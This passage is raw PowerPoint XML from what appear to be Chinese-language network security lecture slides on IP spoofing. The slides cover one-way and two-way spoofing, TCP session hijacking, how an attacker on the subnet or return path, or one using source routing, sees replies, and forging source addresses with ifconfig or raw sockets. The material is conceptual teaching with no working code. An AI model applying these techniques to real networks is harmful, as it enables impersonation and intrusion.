            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>形式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单向：不考虑回传数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>双向：要求看到回传数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高级：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2130464204"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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6AE91581-C243-4EB3-B4E4-5EBA200283A6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99332" name="Picture 3" desc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893763"/>
            <a:ext cx="69850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90097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71" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>欺骗的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228370" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>双向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5B1B7F44-C13C-446A-AB56-1ED7BE19737C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228374" name="Group 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3852863" y="2347913"/>
            <a:ext cx="1511300" cy="1538287"/>
            <a:chOff x="2336" y="2069"/>
            <a:chExt cx="952" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="228363" name="Object 11"/>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662842" name="位图图像" r:id="rId4" imgW="1133633" imgH="1028844" progId="PBrush">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="位图图像" r:id="rId4" imgW="1133633" imgH="1028844" progId="PBrush">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="22836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6" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2336" y="2750"/>
              <a:ext cx="952"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攻击者</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>H</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228380" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1541463" y="2384425"/>
            <a:ext cx="1133475" cy="1028700"/>
            <a:chOff x="612" y="1479"/>
            <a:chExt cx="4808" cy="969"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="228373" name="Group 21"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="612" y="1479"/>
              <a:ext cx="1134" cy="969"/>
              <a:chOff x="521" y="2069"/>
              <a:chExt cx="1134" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="228360" name="Object 8"/>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662843" name="位图图像" r:id="rId6" imgW="1133633" imgH="1028844" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId6" imgW="1133633" imgH="1028844" progId="PBrush">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="22836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5" name="Text Box 13"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="521" y="2750"/>
                <a:ext cx="1134"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被假冒者</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN">
                    <a:latin typeface="Times New Roman" charset="0"/>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="228375" name="Group 23"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4377" y="1479"/>
              <a:ext cx="1043" cy="969"/>
              <a:chOff x="4286" y="2069"/>
              <a:chExt cx="1043" cy="969"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="228364" name="Object 12"/>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="4377" y="2069"/>
              <a:ext cx="714" cy="648"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s662844" name="位图图像" r:id="rId7" imgW="1133633" imgH="1028844" progId="PBrush">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="位图图像" r:id="rId7" imgW="1133633" imgH="1028844" progId="PBrush">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="22836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7" name="Text Box 15"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4286" y="2750"/>
                <a:ext cx="1043" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                    <a:latin typeface="Times New Roman" charset="0"/>
                  </a:rPr>
                  <a:t>目标机器</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                    <a:latin typeface="Times New Roman" charset="0"/>
                  </a:rPr>
                  <a:t>B</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228381" name="Group 29"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5003800" y="2060575"/>
            <a:ext cx="2303463" cy="504825"/>
            <a:chOff x="3152" y="1298"/>
            <a:chExt cx="1451" cy="318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228368" name="Line 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3243" y="1615"/>
              <a:ext cx="1270" cy="1"/>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228372" name="Text Box 20"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3152" y="1298"/>
              <a:ext cx="1451"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假冒包：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>A -&gt; B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228382" name="Group 30"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="2997200"/>
            <a:ext cx="5040313" cy="457200"/>
            <a:chOff x="1474" y="1888"/>
            <a:chExt cx="3175" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228376" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3198" y="1888"/>
              <a:ext cx="1451"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回应包：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>B -&gt; A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="228377" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1474" y="1888"/>
              <a:ext cx="2994" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="dash"/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228378" name="AutoShape 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="5364163" y="3932238"/>
            <a:ext cx="2017712" cy="1008062"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46380"/>
              <a:gd name="adj2" fmla="val 102912"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rot="10800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>能看到这个包吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228379" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5029199"/>
            <a:ext cx="7486650" cy="1428309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>让回应包经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>在同一个子网或在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>B-&gt;A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>路径上</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>使用源路由选项</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282729243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3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8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8" grpId="0" animBg="1"/>
      <p:bldP spid="22837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源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获取响应数据包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗实现方式</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139</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2178973916"/>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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Security Threats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="143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10307" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1556792"/>
          <a:ext cx="7315200" cy="5365750"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s625011" name="Visio" r:id="rId4" imgW="4687519" imgH="3984955" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="4687519" imgH="3984955" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 2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56792"/>
                        <a:ext cx="7315200" cy="536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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB72DFFF-1124-4A97-ACB2-F30B7C034DC1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39596342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10307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="610307"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="610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网络配置改变主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>平台配置命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造或盗用</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140</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="-57150"/>
            <a:ext cx="5534025" cy="6915150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220448812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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包时，填充假冒或伪造的源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Unix/Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台上，直接用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就可以发送，但是需要</a:t>
            </a:r>
            <a:r>
